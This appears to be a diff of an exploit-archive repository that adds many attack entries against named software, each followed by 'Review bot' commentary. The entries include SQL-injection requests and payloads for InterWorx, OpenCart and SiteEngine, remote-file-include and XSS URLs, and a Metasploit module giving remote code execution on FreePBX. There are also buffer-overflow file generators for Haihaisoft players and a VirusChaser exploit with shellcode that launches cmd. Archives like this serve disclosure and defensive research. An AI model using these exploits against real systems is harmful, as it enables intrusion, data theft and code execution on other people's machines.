The InterWorx application stores its data in a MySQL-database. For
interaction with the database dynamic queries are used. These queries
are created by concatenating strings from the application with user
input. However, the application does not perform proper validation or
escaping of the supplied input in the 'i' parameter when sorting user
accounts in NodeWorx, Siteworx and Resellers. Malicious users with
access to this functionality can manipulate database queries to
achieve other goals than the developers had in mind.
The following requests can be used as proof of concept and demonstrate
that user input is concatenated into a database query without proper
validation or escaping. The payload in the first request checks
whether the letter 'm' is the first letter of the database version.
Since the database in use is MySQL this condition is true and the
table is sorted by column 'nu.email'. If the condition is false
(request 2/letter t) the table is sorted by column 'nu.nickname'.
Request 1:
---------------
POST /xhr.php HTTP/1.1
Host: some.host.com:1234
".."
i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='m')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}}
Request 2:
---------------
POST /xhr.php HTTP/1.1
Host: some.host.com:1234
".."
i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='t')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}}
Vendor contact timeline:
---------------------------------
21 Feb 2014: Vendor notification
21 Feb 2014: Vulnerability confirmation
17 Mar 2014: Issue patched
25 Mar 2014: Public disclosure
Solution:
------------
Upgrade to the latest version (5.0.14 build 577) of InterWorx Web Control Panel.
References:
-----------------
[1] InterWorx Beta Channel -
http://forums.interworx.com/threads/8000-InterWorx-Version-5-0-14-Released-on-Beta-Channel!
[2] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org
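Review bot: the fix class is worth naming alongside the PoC. The injection is in the `or` (order-by) member of `pgn8state` in both requests, and an ORDER BY column cannot be passed as a bound parameter, so the "escaping" the advisory says is missing would not be the right remedy either; the correct fix is to map the client-supplied sort key onto an allowlist of column names (`nu.email`, `nu.nickname`, ...) and reject anything else. The two requests differ only in the compared letter ('m' vs 't'), which makes this a blind, boolean-based condition; saying so explicitly would help readers classify the finding.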

platforms/php/webapps/32520.txt Executable file

@ -0,0 +1,50 @@
# Exploit Title : OpenCart <= 1.5.6.1 SQL Injection
# Date : 2014/3/26
# Exploit Author : Saadat Ullah ? saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#Opencart suffers from multipe SQL injection in ebay.php the bug is more about
privilege escalation as attacker may need openbay module access .
Poc
Poorly coded file full of SQLi opencart/system/library/ebay.php
In file opencart/system/library/ebay.php
product_id is used in a SQL query without being sanitize.
public function getEbayItemId($product_id) {
$this->log('getEbayItemId() - Product ID: '.$product_id);
$qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
..............
Function is called on many locations and paramter is passed without santize.
In opencart\admin\controller\openbay\openbay.php
public function editLoad() {
...
$item_id = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
..............
Where $this->request->get['product_id'] comming from GET field.
Similarly More
public function isEbayOrder($id) {
...
$qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");
In opencart\admin\controller\extension\openbay.php
public function ajaxOrderInfo()
...
if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
..............
More
public function getProductStockLevel($productId, $sku = '') {
...
$qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
..............
ebay.php has many more..
User should have openbay module access
http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'
#Independent Pakistani Security Researcher
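Review bot: the second Software Link line (`: https://github.com/opencart`) is missing the `# ` prefix every other header field carries, and the separator after the author's name rendered as `?`, which looks like an encoding artifact. Typos in the body: 'multipe', 'without being sanitize', 'paramter', 'santize', 'comming'. On the substance, all three quoted queries build SQL by concatenating `$product_id`, `$id` and `$productId` directly into string literals; since each is a numeric identifier, the advisory would be more useful to a maintainer if it named the fix, i.e. an `(int)` cast (or escaping through the DB layer) inside `getEbayItemId()`, `isEbayOrder()` and `getProductStockLevel()` rather than at each caller. The PoC URL also embeds a concrete admin `token=` value, which is session-bound; a `[token]` placeholder would make it clearer that an authenticated openbay session is a precondition, as the text already says.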

10
platforms/php/webapps/32521.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31883/info
Osprey is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying computer; other attacks are also possible.
Osprey 1.0a4.1 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/web/lib/xml/oai/ListRecords.php?lib_dir=[shell]
http://www.example.com/[path]/web/lib/xml/oai/ListRecords.php?xml_dir=[shell]
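Review bot: both PoC URLs hand a `[shell]` placeholder to `lib_dir` and `xml_dir`, which tells a reader these are include-path parameters, yet the record never says so or names the include in `ListRecords.php` that consumes them. Suggest stating that the values reach an include/require, since that is what makes the remote case depend on `allow_url_include` and the local case on a missing traversal check; the fix for both is to resolve the library and XML directories server-side and ignore the request parameter entirely.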

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31888/info
SiteEngine is prone to a remote URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing-style attacks.
SiteEngine 5.0 is vulnerable; other versions may also be affected.
http://www.example.com/api.php?action=logout&forward=http://www.example2.com
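Review bot: the PoC shows `forward=` on the logout action accepting an absolute external URL, but the record gives no remediation hint. Suggest noting that the fix is to restrict `forward` to same-origin relative paths (an allowlist of known destinations), not to filter the string, and that a logout endpoint is a natural lure for the phishing use the description mentions because the user expects to land on a login page.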

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31889/info
SiteEngine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SiteEngine 5.0 is vulnerable; other versions may also be affected.
http://www.example.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*
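Review bot: the PoC's leading `%bf%27` is the multibyte-charset bypass of `addslashes()`-style escaping, in which the 0xBF byte absorbs the backslash inserted before the quote when the connection charset is a GBK-like encoding; the description's 'fails to sufficiently sanitize' hides that the application appears to escape, just with the wrong charset assumptions. Worth stating, because the remediation differs from the generic one: set the connection charset explicitly and move to parameterised queries rather than adding more escaping. The 11-column `UNION SELECT` with `user()` in position 3 also records the column count of the `announcements` query, which is a useful detection fingerprint for this specific request.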

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31890/info
Jetbox CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Jetbox CMS 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/admin/postlister/index.php?liste=default%22%3E%3Cscript%3Ealert(1)%3C/script%3E
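Review bot: the PoC path is under `/admin/postlister/`, so the reflected `liste` parameter is only reachable by an authenticated administrator, and the description should say so since it changes the severity assessment: the realistic impact is an admin lured to a crafted link, not an anonymous visitor. The payload opens with `%22%3E` (closing a double-quoted attribute), so the reflection point is inside an HTML attribute and the fix is entity-encoding on output with `ENT_QUOTES`.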

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31898/info
ClipShare Pro is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
ClipShare Pro 4.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/[script_dir]/fullscreen.php?title=%3C/title%3E%3Cscript%3Ealert(1);%3C/script%3E
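Review bot: the payload begins with `%3C/title%3E`, which shows `title` is reflected inside the page's `<title>` element; the record should state that, because `<title>` is RCDATA and a `<script>` injected there does not run until the element is closed, which is exactly what the leading `</title>` does. The fix is entity-encoding the value on output (`htmlspecialchars()`), and a detection rule keyed on `</title>` appearing in a query string catches this pattern specifically.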

11
platforms/php/webapps/32527.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31908/info
Adam Wright HTMLTidy is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
HTMLTidy 0.5 is vulnerable; other versions may also be affected. Products that include HTMLTidy as a component will also be vulnerable.
NOTE: This record was previously titled 'Kayako eSupport html-tidy-logic.php Cross Site Scripting Vulnerability'. It has been updated to properly describe the vulnerability as an HTMLTidy issue.
http://www.example.com/[script_dir]/includes/htmlArea/plugins/HtmlTidy/html-tidy-logic.php?jsMakeSrc=return%20ns;%20}%20alert(2008);%20function%20whynot(){%20alert(2);
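Review bot: the `jsMakeSrc` payload (`return ns; } alert(2008); function whynot(){ alert(2);`) contains no HTML at all, which means the parameter is written into a JavaScript function body by `html-tidy-logic.php` and this is a script-context injection; the generic 'fails to properly sanitize user-supplied input' hides that. It matters because HTML-entity encoding, the usual XSS fix, would not help here: the value needs JS-string/JSON encoding or, better, should not be echoed into script at all. The NOTE about the retitling from Kayako eSupport is useful and should stay.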

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31911/info
iPei Guestbook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/index.php?pg=c0d3_xss
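Review bot: the PoC `pg=c0d3_xss` is a marker string rather than a script payload, so at most it demonstrates that `pg` is reflected, not that script executes, and the record names no affected version although every neighbouring record does. Suggest either a payload that reveals the reflection context or wording that makes clear this entry is a reflection indicator only.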

@ -1,39 +1,39 @@
======================================================
Advanced comment system1.0 Remote File Inclusion Vulnerability
<<!>> Found by : kurdish hackers team
<<!>> C0ntact : pshela [at] YaHoo .com
<<!>> Groups : Kurd-Team
<<!>> site : www.kurdteam.org
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script :: Advanced_comment_system_1-0
<<->> download script :: http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> Exploit ::
>>> www.site/path /advanced_comment_system/index.php?ACS_path=[shell.txt?]
/advanced_comment_system/admin.php?ACS_path=[shell.txt?]
=======================================================
=======================================================
<<->> All freinds , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team
# milw0rm.com [2009-09-10]
======================================================
Advanced comment system1.0 Remote File Inclusion Vulnerability
<<!>> Found by : kurdish hackers team
<<!>> C0ntact : pshela [at] YaHoo .com
<<!>> Groups : Kurd-Team
<<!>> site : www.kurdteam.org
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script :: Advanced_comment_system_1-0
<<->> download script :: http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> Exploit ::
>>> www.site/path /advanced_comment_system/index.php?ACS_path=[shell.txt?]
/advanced_comment_system/admin.php?ACS_path=[shell.txt?]
=======================================================
=======================================================
<<->> All freinds , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team
# milw0rm.com [2009-09-10]
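Review bot: the before and after halves of this `-1,39 +1,39` hunk render identically, so the change is whitespace or line-ending only and invisible on the page; a one-line mention of that in the commit would save the next reader from diffing the two copies by eye. The file header for this hunk is also absent from the rendered page, so the record's path and ID cannot be read off it; the milw0rm date line is the only identifier present.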

103
platforms/unix/remote/32512.rb Executable file
@ -0,0 +1,103 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "FreePBX config.php Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.
It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php"
parameters "function" and "args".
},
'License' => MSF_LICENSE,
'Author' =>
[
'i-Hmx', # Vulnerability discovery
'0x00string', # PoC
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'References' =>
[
['CVE', '2014-1903'],
['OSVDB', '103240'],
['EDB', '32214'],
['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123']
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
['FreePBX', {}]
],
'Privileged' => false,
'DisclosureDate' => "Mar 21 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/'])
], self.class)
register_advanced_options(
[
OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru'])
], self.class)
end
def check
vprint_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "admin", "CHANGES")
})
if res and res.code == 200 and res.body =~ /^(.*)$/
version = $1
else
return Exploit::CheckCode::Unknown
end
vprint_status("#{peer} - Version #{version} detected")
if version =~ /2\.(9|10|11)\.0/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
rand_data = rand_text_alpha_lower(rand(10) + 5)
print_status("#{peer} - Sending payload")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "admin", "config.php"),
'vars_get' => {
"display" => rand_data,
"handler" => "api",
"function" => datastore['PHPFUNC'],
"args" => payload.encoded
}
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
if res and res.code != 200
print_error("#{peer} - Unexpected response, exploit probably failed!")
end
end
end
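Review bot: in `check`, `res.body =~ /^(.*)$/` captures the first line of `admin/CHANGES` whatever it contains, so `version` is set even when the 200 response is something else entirely, and the following `/2\.(9|10|11)\.0/` then reports `Safe` on a real FreePBX whose CHANGES file does not open with a bare version line. Suggest anchoring the capture on a version shape, e.g. `/^(\d+\.\d+\.\d+[\d.]*)/`, and returning `Unknown` when it does not match. Two smaller points: the header comment URL `http//metasploit.com/download` is missing its colon, and in `exploit` a nil `res` (connection failure) produces no message at all because the guard is `if res and res.code != 200`; a `print_error` on nil would make that failure visible.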

56
platforms/windows/dos/32513.py Executable file
@ -0,0 +1,56 @@
?#-----------------------------------------------------------------------------#
# Exploit Title: Haihaisoft HUPlayer 1.0.4.8 - Buffer Overflow (SEH) #
# Date: Mar 25 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.haihaisoft.com/huplayer.aspx #
# Version: 1.0.4.8 #
# Tested on: Windows XP SP3 #
#-----------------------------------------------------------------------------#
# (59c.5c4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000003 ebx=0141897a ecx=44444444 edx=01e28c98 esi=01e28c99 edi=01e28367
# eip=0044754f esp=01e27b3c ebp=0000079d iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
# *** ERROR: Module load completed but symbols could not be loaded for mpc-hc.exe
# mpc_hc+0x4754f:
# 0044754f 3b69f4 cmp ebp,dword ptr [ecx-0Ch] ds:0023:44444438=????????
# 0:005> g
# (59c.5c4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
# eip=43434343 esp=01e2776c ebp=01e2778c iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 43434343 ?? ???
# 0:005> !exchain
# 01e27780: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc)
# 01e28b68: 43434343
# Invalid exception stack at 42424242
#!/usr/bin/python
junk1 = "\x80" * 50;
offset = "\x41" * 1595;
nSEH = "\x42" * 4;
SEH = "\x43" * 4;
junk2 = "\x44" * 5000;
evil = "http://{junk1}{offset}{nSEH}{SEH}{junk2}".format(**locals())
for e in ['m3u', 'pls', 'asx']:
if e is 'm3u':
poc = evil
elif e is 'pls':
poc = "[playlist]\nFile1={}".format(evil)
else:
poc = "<asx version=\"3.0\"><entry><ref href=\"{}\"/></entry></asx>".format(evil)
try:
print("[*] Creating poc.%s file..." % e)
f = open('poc.%s' % e, 'w')
f.write(poc)
f.close()
print("[*] %s file successfully created!" % f.name)
except:
print("[!] Error while creating exploit file!")
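Review bot: `if e is 'm3u'` / `elif e is 'pls'` compare strings by identity, which only works because CPython happens to intern these short literals; use `==`. The shebang `#!/usr/bin/python` sits after the header comment block where it is inert, and the first header line carries a stray `?` that looks like a UTF-8 BOM left by the editor. The bare `except:` also hides the real error when the file cannot be written. None of this changes what the PoC writes today, but the first point will break silently under another interpreter.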

57
platforms/windows/dos/32514.py Executable file
@ -0,0 +1,57 @@
?#-----------------------------------------------------------------------------#
# Exploit Title: Haihaisoft Universal Player 1.5.8 - Buffer Overflow (SEH) #
# Date: Mar 25 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.haihaisoft.com/hup.aspx #
# Version: 1.5.8.0 #
# Tested on: Windows XP SP3 #
#-----------------------------------------------------------------------------#
# (6ec.57c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=44444444 ecx=0000000f edx=00000000 esi=04bae7d0 edi=44444448
# eip=0069537f esp=04cb7b18 ebp=04cb7b58 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** ERROR: Module load completed but symbols could not be loaded for mplayerc.exe
# mplayerc+0x29537f:
# 0069537f f3ab rep stos dword ptr es:[edi]
# 0:005> g
# (6ec.57c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
# eip=43434343 esp=04cb7748 ebp=04cb7768 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 43434343 ?? ???
# 0:005> !exchain
# 04cb775c: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc)
# 04cb7b4c: mplayerc+2e2e78 (006e2e78)
# 04cb8b80: 43434343
# Invalid exception stack at 42424242
#!/usr/bin/python
junk1 = "\x80" * 50;
offset = "\x41" * 1591;
nSEH = "\x42" * 4;
SEH = "\x43" * 4;
junk2 = "\x44" * 5000;
evil = "http://{junk1}{offset}{nSEH}{SEH}{junk2}".format(**locals())
for e in ['m3u', 'pls', 'asx']:
if e is 'm3u':
poc = evil
elif e is 'pls':
poc = "[playlist]\nFile1={}".format(evil)
else:
poc = "<asx version=\"3.0\"><entry><ref href=\"{}\"/></entry></asx>".format(evil)
try:
print("[*] Creating poc.%s file..." % e)
f = open('poc.%s' % e, 'w')
f.write(poc)
f.close()
print("[*] %s file successfully created!" % f.name)
except:
print("[!] Error while creating exploit file!")
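Review bot: same three defects as in 32513.py: `is` used for string comparison in the `m3u`/`pls` branches (should be `==`), the shebang placed after the comment block where it has no effect, and a stray leading `?` (BOM) on the first line. The only functional differences from 32513.py are the product and the offset (1591 versus 1595), so if the two files are meant to stay in sync, fixing the comparison in one and not the other would be easy to miss.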

37
platforms/windows/dos/32522.py Executable file
@ -0,0 +1,37 @@
# Exploit Title: VirusChaser 8.0 - Stack Buffer Overflow
# Date: 2014/03/26
# Exploit Author: wh1ant
# Vendor Homepage: https://www.viruschaser.com/
# Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip
# Version: 8.0
# Tested on: Windows 7 ultimate K
#
# You must have administrator permission to run
from struct import pack
import os
shellcode = "\x66\x83\xc4\x10" # add esp, 0x10
shellcode += "\xb8\x50\x70\x50\x50" # mov eax, 0x50507050
shellcode += "\xb9\x4e\x7d\x04\x27" # mov ecx, 0x27047d4e
shellcode += "\x03\xc1" # add eax, ecx ; WinExec() address
shellcode += "\x68\x63\x6d\x64\x01" # push 0x01646D63
shellcode += "\x66\xb9\x50\x50" # add cx, 0x5050
shellcode += "\x66\x81\xc1\xb0\xaf" # add cx, 0xafb0
shellcode += "\x88\x4c\x24\x03" # mov [esp+3], cl
shellcode += "\x8b\xd4" # mov edx, esp
shellcode += "\x66\x51" # push cx
shellcode += "\x41" # inc cx
shellcode += "\x66\x51" # push cx
shellcode += "\x52" # push edx
shellcode += "\x50" # push eax
shellcode += "\x50" # push eax
shellcode += "\xc3\x90" # retn ; WinExec()
# BOF retn: 0x0040753d
pay = shellcode
pay = pay.rjust(520, "\x90")
pay += "\x9c\xdb\x12"
os.system("C:\\\"Program Files\\VirusChaser\\scanner.exe\" \"" + pay + "\"")
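Review bot: the comment `# BOF retn: 0x0040753d` does not match the bytes actually appended, `"\x9c\xdb\x12"`, which with the argument's terminating NUL form the little-endian value 0x0012db9c, so either the comment or the bytes is stale and the file should say which is intended. `from struct import pack` is imported and never used. The `WinExec()` address is assembled from two constants (`0x50507050 + 0x27047d4e`) and is therefore tied to the exact kernel32 build and ASLR state of the tested Windows 7 K machine; the header should state that, since it is why the PoC fails elsewhere and also why a detection engineer should not treat those constants as a signature.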

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/31855/info
Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.
<html>
<body>
<script>alert('backdoored');</script>
</body>
</html>
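Review bot: the record's whole point is the FTP delivery context, yet the PoC is a plain HTML file with nothing saying it must be fetched through an `ftp://` URL to reproduce, and the description names no browser despite 'multiple vendors'. Suggest adding the `ftp://` URL form under which the file is served and listing the affected browsers; as it stands the entry is indistinguishable from a generic HTML test page.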

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31855/info
Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.
<html>
<body>
<script>alert('backdoored');</script>
</body>
</html>
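Review bot: this hunk is a verbatim copy of the preceding one (same `bid/31855` source, same HTML), differing only in the declared line count (11 versus 12); if the two files are meant to cover different browsers, each should say which, otherwise one of them is redundant.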